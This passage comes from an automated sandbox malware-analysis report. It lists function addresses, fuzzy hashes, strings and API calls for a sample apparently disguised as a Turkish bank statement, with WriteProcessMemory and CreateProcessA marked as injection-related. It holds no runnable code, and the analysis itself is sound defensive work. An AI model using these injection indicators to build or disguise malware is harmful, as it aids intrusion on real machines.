Opcode ID: e111167d3ee142a23f48bb00bb10f8c0c069fbdf909caa08138a8c78780b1c19
Instruction ID: 536f5b7b143b8410306ef3b6bc5067a69e5c1407c40e88631f12cb64b36354f6
Opcode Fuzzy Hash: e111167d3ee142a23f48bb00bb10f8c0c069fbdf909caa08138a8c78780b1c19
Instruction Fuzzy Hash: 7C219A30E01248DFDB05CFA5D640AEEBFB6EF88244F2484A9E415A7290EB70E940CB20

Function 02B36300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fda80318c4d6c03c0d6960e73ffd8e881820d507b0c4e17ace3c3013c1c8fc7
Instruction ID: a14b1b13b8e61cfd349f27b4d72a2fb1e04bb05c8b257257a3ce1f40bfaa9562
Opcode Fuzzy Hash: 2fda80318c4d6c03c0d6960e73ffd8e881820d507b0c4e17ace3c3013c1c8fc7
Instruction Fuzzy Hash: B611A535701511AFC71A9A2DD45492EB7AAFFC57A531984B8E826CB360DF31DC02C794

Function 02B3F312 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df799d3b1982b1e8fc70c812f71e051d332c71feb1d6a2e3e7c21a352c727487
Instruction ID: 7f09f80b715dbed8eebebdb4d683b66be49756213723db03cf089d106cd02151
Opcode Fuzzy Hash: df799d3b1982b1e8fc70c812f71e051d332c71feb1d6a2e3e7c21a352c727487
Instruction Fuzzy Hash: B6215CB0D00209DFDB45EFA9D540B9EBFF2FF44304F10C9A9D0289B665EB745A458B80

Function 0115D54F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713020264.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_115d000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction ID: 55c47ea054165aba4219c3cb538fa9c68fb9661858e140f3d41b40b7feb3980b
Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction Fuzzy Hash: 08119A76504280CFDF16CF54E9C4B16BF72FB88324F2486A9DD090B656C33AD45ACBA2

Function 02B3F320 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63a6b1c55f68b9933912ccb5fd8409f22cebcf532c4b34d3c0026db0ca7925a1
Instruction ID: 8aa323ed9536996146aed42e397f642926cff9ae192b090f6db05154612557b7
Opcode Fuzzy Hash: 63a6b1c55f68b9933912ccb5fd8409f22cebcf532c4b34d3c0026db0ca7925a1
Instruction Fuzzy Hash: AF115BB0E00609DFCB45EFA9D940A9EBFF2FF44304F10C5A9D0289B669EB745A458F81

Function 02B3EB65 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 224719afe422d5156503d3aff40815950ef1d35583540d1b44df2c9ebbb9587e
Instruction ID: b23c511ade530f473c27e86358b416a010e4e58a4fbd3f76dbe43218c56ccb2f
Opcode Fuzzy Hash: 224719afe422d5156503d3aff40815950ef1d35583540d1b44df2c9ebbb9587e
Instruction Fuzzy Hash: 28214A74E04229CFDB65DFA8D994BADBBB1BF49304F5090AAE409A7351DB30A985CF40

Function 0116D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713129243.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_116d000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction ID: 35f667ecd73f25cbf961a517a69862120cd0d0f8f7eba8fa0f7d638b80b0c45e
Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction Fuzzy Hash: 2311BB75604284CFDB16CF68D9C4B16BBA2FB84314F24C6A9D8894B256C33BD45ACB62

Function 02B327F0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b01b3f4a2cc90197ab42163b791931d0000cbc0eb98b373d3d80754692d9c21c
Instruction ID: 07ba78271f6ecf92074d4993aa9df45e8b10c8b28e33e89479cb8e8088aafbb4
Opcode Fuzzy Hash: b01b3f4a2cc90197ab42163b791931d0000cbc0eb98b373d3d80754692d9c21c
Instruction Fuzzy Hash: CC21C274C0160A8FCB40EFA9D9446EEBBF4FF49300F10466AD815B3224EB351A95CFA1

Function 02B35E98 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0d060debf68c99411c4660053d5cb5d2673f9f84c13e59f5b445d9fa04e79c5
Instruction ID: ccce5faca85780ba6d096644b4209c3016d8ce80fd21deb53799f669bfd73a8b
Opcode Fuzzy Hash: e0d060debf68c99411c4660053d5cb5d2673f9f84c13e59f5b445d9fa04e79c5
Instruction Fuzzy Hash: 7101D8337002186FCB56DE68AC10BAF3BDAEBCC794F148069F915C7240CE7289129790

Function 02B3ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbc25f3cef419b44335ac60ada500c7657d2d8041e40b699281b47bd6ea6586
Instruction ID: a8288e78aa1f1572d7d49d848fc9e8d3509e029cd0d74e8d5291120cc0cfdb00
Opcode Fuzzy Hash: 2fbc25f3cef419b44335ac60ada500c7657d2d8041e40b699281b47bd6ea6586
Instruction Fuzzy Hash: 71F0BB317406104B87176A2EDC58B2AB7DEEFC9A593A540B9E949C7361EF21CC03C790

Function 02B3E8E8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8bf000bb28d29d4bda01617fdc66f1530467aec0795c905de5752f7c435b19d
Instruction ID: 3ad8c4eaffc4c1a372f3e9d6c513fe69ebecc989187c609a9b8aac22e6d5003f
Opcode Fuzzy Hash: e8bf000bb28d29d4bda01617fdc66f1530467aec0795c905de5752f7c435b19d
Instruction Fuzzy Hash: C3019E78D0020ADFCF41DFA8E944AEEBBB1FB49300F108166D914A3354E7345A16CF80

Function 02B328AB Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b12dd600b888da55e5217f6f13f9a71c357382c74e198b2cf92f3d2b5746fe25
Instruction ID: bf47467d5e4437c1606cfe1acee05098bb95f807e9d0c2d7241ff5944cec20b5
Opcode Fuzzy Hash: b12dd600b888da55e5217f6f13f9a71c357382c74e198b2cf92f3d2b5746fe25
Instruction Fuzzy Hash: 6EE0C232D2022B968F00E6A5DC004DFB738EE82260B944626D42033104EB30265882E0

Function 02B328B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc7d95e930c3eea9f9caa4a8ce5e9b5cd64ba1bfe94f51e9737436ff17f2841a
Instruction ID: db8cfe9a5269b80211ebb607dba456c0403f579192cc5d7d749a334f38f8a52d
Opcode Fuzzy Hash: fc7d95e930c3eea9f9caa4a8ce5e9b5cd64ba1bfe94f51e9737436ff17f2841a
Instruction Fuzzy Hash: F6D01231D2022B968B00A6A5DC044DEB739EE96261B544626D52437154EB70265986E1

Function 02B3D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1547d3f22202818f33790c8b8333eecf2ce4f23d712e1ecfae1f60ac84a5854
Instruction ID: 61a741901dd7bfbef92b97954e0f6ad9c765b1bf51a33bf63b4ce85ce5c6846e
Opcode Fuzzy Hash: c1547d3f22202818f33790c8b8333eecf2ce4f23d712e1ecfae1f60ac84a5854
Instruction Fuzzy Hash: 0AD06775E4410DCBCF21DFB8E5844DCFBB5EF49361F10546AD925A3251D6305465CF11

Function 02B36739 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f351ab224daf3975c63daf1a069363435755fca067d85b3c0d43ddd7de27ba6e
Instruction ID: 23c30f011d734d6f6f271e49f4b41e776b10cf59f766326683587d685243626e
Opcode Fuzzy Hash: f351ab224daf3975c63daf1a069363435755fca067d85b3c0d43ddd7de27ba6e
Instruction Fuzzy Hash: 16D05E3241878D4AC746E775B955B643F29EB80208F448E50E0950790BEFA81C668750

Function 02B3AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9475a94c9cd1aeb4f5c6e7424b85828066c3bd288ad2024a0880d5f437afdffc
Instruction ID: 425fc8be88a2a29422e0be5d5f45b439cd9f399663d7d80c52e2093f218572b1
Opcode Fuzzy Hash: 9475a94c9cd1aeb4f5c6e7424b85828066c3bd288ad2024a0880d5f437afdffc
Instruction Fuzzy Hash: 16D0673AB400189FCB04DF9CE840CDDF776FB98221B048516E915A3265C6319965DB50

Function 02B36748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3327eeaa307b1ec0c9862905b4b034fceaff21a2a8b685c19a9ebaaac762761
Instruction ID: 6d1bb0e5131550ba9269836dd37a05dfd09b484d08afa05098ab88d5908bf34c
Opcode Fuzzy Hash: f3327eeaa307b1ec0c9862905b4b034fceaff21a2a8b685c19a9ebaaac762761
Instruction Fuzzy Hash: 3AC0123140470D4BC646F775FD45A55372EEF802087808910F0160794EEFB82C954690

Non-executed Functions

Function 02B36920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;cq, xrefs: 02B3695E
\;cq, xrefs: 02B36936
\;cq, xrefs: 02B36952
\;cq, xrefs: 02B3692C

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: \;cq$\;cq$\;cq$\;cq
API String ID: 0-2961067002
Opcode ID: b1e43bc3968ef5190f721d058850c6d87ff5dd9e01a44e6e5ac8e83ee21244f1
Instruction ID: 9c521dc6933ab30ba4cdb8d34c861d3ae3dd1e59016d22a8607124159f942592
Opcode Fuzzy Hash: b1e43bc3968ef5190f721d058850c6d87ff5dd9e01a44e6e5ac8e83ee21244f1
Instruction Fuzzy Hash: FF01B831700104AFCB2E8E2CC440A2637EAEFDC76072542AAE606CB3A4DB31EC41C788

Analysis Process: UDYiGmDlq.exePID: 7312, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	227
Total number of Limit Nodes:	12

Executed Functions

Function 00A1D570 Relevance: 6.1, APIs: 4, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00A1D5FE
GetCurrentThread.KERNEL32 ref: 00A1D63B
GetCurrentProcess.KERNEL32 ref: 00A1D678
GetCurrentThreadId.KERNEL32 ref: 00A1D6D1

Memory Dump Source

Source File: 0000000B.00000002.2362027743.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a10000_UDYiGmDlq.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 86f34d735ba82dbe1447ad5a92344e1ec21e213de1482b00fdb4739e173f084e
Instruction ID: 9e5a58a6f81b2a3d9f2d4dc99544c49eee2c47ca89fada120b1642ed6455ac5e
Opcode Fuzzy Hash: 86f34d735ba82dbe1447ad5a92344e1ec21e213de1482b00fdb4739e173f084e
Instruction Fuzzy Hash: 645158B090034A8FDB14CFA9D948BDEBBF5EF88314F248459E019A73A1DB74A944CB65

Function 00A1D580 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00A1D5FE
GetCurrentThread.KERNEL32 ref: 00A1D63B
GetCurrentProcess.KERNEL32 ref: 00A1D678
GetCurrentThreadId.KERNEL32 ref: 00A1D6D1

Memory Dump Source

Source File: 0000000B.00000002.2362027743.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a10000_UDYiGmDlq.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 89d10449f0f59ef8bd2b7dca5830a0ea719126ba25ec923580338824e93e2e4a
Instruction ID: 107c2817673fa78e5925a9b2996fa93753e4afccdd573fcad082ef4b9093b7a0
Opcode Fuzzy Hash: 89d10449f0f59ef8bd2b7dca5830a0ea719126ba25ec923580338824e93e2e4a
Instruction Fuzzy Hash: 4E5157B090034ACFDB14DFA9D948BDEBBF1EF88314F248459E019A7361DB74A984CB65

Function 07199250 Relevance: 3.9, Strings: 3, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8gq, xrefs: 07199387
8gq, xrefs: 071992DF
8gq, xrefs: 071992CF

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: 8gq$8gq$8gq
API String ID: 0-3143538186
Opcode ID: a88f08b930492cf3da019b2f0cc4edaed55cc094904a96b61ac4a67d8f0f88d1
Instruction ID: d3e9d6a54e8b05f3ce8b03894d90bed9bea405d92e3480d96ee662351fc6e9cd
Opcode Fuzzy Hash: a88f08b930492cf3da019b2f0cc4edaed55cc094904a96b61ac4a67d8f0f88d1
Instruction Fuzzy Hash: 193104F4A18206DFDF089FB584515BE7B71EBCA210F52807ED546AB3C1DB356A0387A2

Function 0719839F Relevance: 3.8, Strings: 3, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$cq, xrefs: 071983E4
8, xrefs: 07198413
$cq, xrefs: 071983F0

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: 8$$cq$$cq
API String ID: 0-2950882162
Opcode ID: 662c1f552122caf433f5853b01960a4d435ab9b294726959b7362109331d8fd9
Instruction ID: 82d5449a2904afc284806f5fae9b2466094726c5d41548479a9227d27b60dbc6
Opcode Fuzzy Hash: 662c1f552122caf433f5853b01960a4d435ab9b294726959b7362109331d8fd9
Instruction Fuzzy Hash: 2801FEB0750205DFFF248A28CC167993672BB51710F554875D805AF6C2EBB4DD92C791

Function 07192AC7 Relevance: 2.7, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hgq, xrefs: 07192B0B
(gq, xrefs: 07192CB0

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: (gq$Hgq
API String ID: 0-3303014377
Opcode ID: e15372b923ba5c69eb3990e729ae3eb7bd1cc4dee07f59b7eae64bf079c12fd4
Instruction ID: 9dd4ce8ac43796d0a9c7d219e4eb0122c3da8163bbedb7c5b603447047cfd8d8
Opcode Fuzzy Hash: e15372b923ba5c69eb3990e729ae3eb7bd1cc4dee07f59b7eae64bf079c12fd4
Instruction Fuzzy Hash: C981AEB1A002199FDF15EF69D8046AEBBF5FF89310F148479D406E7381DB389942CBA5

Function 071982D0 Relevance: 2.5, Strings: 2, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$cq, xrefs: 071982F2
$cq, xrefs: 071982E6

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: $cq$$cq
API String ID: 0-2695052418
Opcode ID: 0f819181488962af947983e30c8718ecc30aea4b7d61c84f887fce498adec3db
Instruction ID: 00e42f35388ebcb142330a440853c683b80fffc4a3d3b3fde1aaf2b5a0891a18
Opcode Fuzzy Hash: 0f819181488962af947983e30c8718ecc30aea4b7d61c84f887fce498adec3db
Instruction Fuzzy Hash: 8E0175B161D645CFCB19DB24D8142A17BA1BB03244F5582FBD40ACB2D3C735D983C79A

Function 07295C3C Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07295E7E

Memory Dump Source

Source File: 0000000B.00000002.2373222550.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7290000_UDYiGmDlq.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2a74b0084919c72219d3d19c56b0b607a646370e00cb28e97804d79e5e8113b1
Instruction ID: 235d68f477221cda4375af20204ce67c6b23ea3d75e71df400f02f57f3286e28
Opcode Fuzzy Hash: 2a74b0084919c72219d3d19c56b0b607a646370e00cb28e97804d79e5e8113b1
Instruction Fuzzy Hash: 5D916DB1E1061ACFDF21CF69C8457EDBBB2BF49310F1881A9D818A7280DB749995CF91

Function 07295C48 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07295E7E

Memory Dump Source

Source File: 0000000B.00000002.2373222550.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7290000_UDYiGmDlq.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 517a7c40e6a3f40f5194a59ed9e3b2440b10294ccf484ec0ec1b84e606b8d5d7
Instruction ID: d6fc4292938aabf952e66dd229c08e8d474e5ff372ee8f1094cc430bdac8e520
Opcode Fuzzy Hash: 517a7c40e6a3f40f5194a59ed9e3b2440b10294ccf484ec0ec1b84e606b8d5d7
Instruction Fuzzy Hash: 18916EB1E1021ACFDF21CF69C8457DDBBB2BF49310F1881A9D818A7280DB749995CF91

Function 00A1B300 Relevance: 1.7, APIs: 1, Instructions: 233COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00A1B566

Memory Dump Source

Source File: 0000000B.00000002.2362027743.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a10000_UDYiGmDlq.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 12e11ba859d600fee1fccc4ffcfa561345ebf87311844d241c3be21ed8aa5661
Instruction ID: bc155f471ea13c3b66abfb901fe0531b431fa127ff839ffcca0988f8df94568b
Opcode Fuzzy Hash: 12e11ba859d600fee1fccc4ffcfa561345ebf87311844d241c3be21ed8aa5661
Instruction Fuzzy Hash: F99177B0A10B458FD725DF6AD44179ABBF1FF88314F00892ED096CBA51D734E989CBA1

Function 00A1590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00A159C9

Memory Dump Source

Source File: 0000000B.00000002.2362027743.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a10000_UDYiGmDlq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: fc4061a73889a03f6fe403d9d2f967bf4ea591fe86800062e1097b7e537fbe07
Instruction ID: 894e803aa515b206a4b344f82e097d7e5531750932c0ec02be6e099af2ae53ed
Opcode Fuzzy Hash: fc4061a73889a03f6fe403d9d2f967bf4ea591fe86800062e1097b7e537fbe07
Instruction Fuzzy Hash: 3C41CFB1C00719CFDB24CFA9C888BDDBBB5BF89304F24816AD409AB255DB756949CF50

Function 00A144B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00A159C9

Memory Dump Source

Source File: 0000000B.00000002.2362027743.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a10000_UDYiGmDlq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 5a092f06acc584ae69a7d2bafe20c43ba4ec3f7d8e640b17cb2cd1fc2f6ea8b7
Instruction ID: 70c99ca01cff3798c70d30c6406bf2ba6a3a076e91b3ee551d77301e37e91f39
Opcode Fuzzy Hash: 5a092f06acc584ae69a7d2bafe20c43ba4ec3f7d8e640b17cb2cd1fc2f6ea8b7
Instruction Fuzzy Hash: B641B2B0D00719CBDB24DFA9C884BDDBBF5BF89304F20816AD409AB251DB756949CF91

Function 072959B9 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07295A50

Memory Dump Source

Source File: 0000000B.00000002.2373222550.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7290000_UDYiGmDlq.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7e098c614dbdf258e4678bbb935b5a810bec80e5430791fcd47ff4e52da9d206
Instruction ID: d23b0666f2578d60c9f3af902f6d317e93459975e01fd7d608fd1f9c7102638d
Opcode Fuzzy Hash: 7e098c614dbdf258e4678bbb935b5a810bec80e5430791fcd47ff4e52da9d206
Instruction Fuzzy Hash: B52137B59003499FDB10CFAAC885BEEBBF5FF48310F14842AE918A7241D7789954CBA4

Function 0750EFC2 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 0750F05F

Memory Dump Source

Source File: 0000000B.00000002.2373434032.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7500000_UDYiGmDlq.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 31cdc17ae3e2fc08e4999c197dd2d0bb0d1a76655a0d124e8148a8918788753e
Instruction ID: 66d10c0b3502d3191e6d9721475db2dfd8f713af6b19ac338b5bdbc4ff6f125a
Opcode Fuzzy Hash: 31cdc17ae3e2fc08e4999c197dd2d0bb0d1a76655a0d124e8148a8918788753e
Instruction Fuzzy Hash: 6C21C3B5D0030A9FDB10CF9AD884ADEFBF5FB48320F14842AE919A7250D775A944CFA4

Function 072959C0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07295A50

Memory Dump Source

Source File: 0000000B.00000002.2373222550.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7290000_UDYiGmDlq.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 22829e0868cdcad0fcc7f2fef492c95b9aa67104dd759cdefdf390aa05fde532
Instruction ID: 01dca80015bdf6762ba1f3f5e345818ae520cbb54b9fcfb1b17d6f963c3d4a40
Opcode Fuzzy Hash: 22829e0868cdcad0fcc7f2fef492c95b9aa67104dd759cdefdf390aa05fde532
Instruction Fuzzy Hash: D52169B19003499FCF10CFAAC885BDEBBF5FF48310F14842AE918A7240C7789954CBA4

Function 0750EFC8 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 0750F05F

Memory Dump Source

Source File: 0000000B.00000002.2373434032.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7500000_UDYiGmDlq.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: d665cb82db43b5711ff984553b70a78b740f68f312f77de354aed7e14e97dcf5
Instruction ID: 865f4ea48b5e7fe462ba327071c172e7086c0be4eacc081545dd6aef76915cca
Opcode Fuzzy Hash: d665cb82db43b5711ff984553b70a78b740f68f312f77de354aed7e14e97dcf5
Instruction Fuzzy Hash: 6F21A3B5D0030A9FDB10CF9AD884ADEFBF5FB48310F14842AE919A7250D775A944CFA1

Function 00A1D7C0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A1D84F

Memory Dump Source

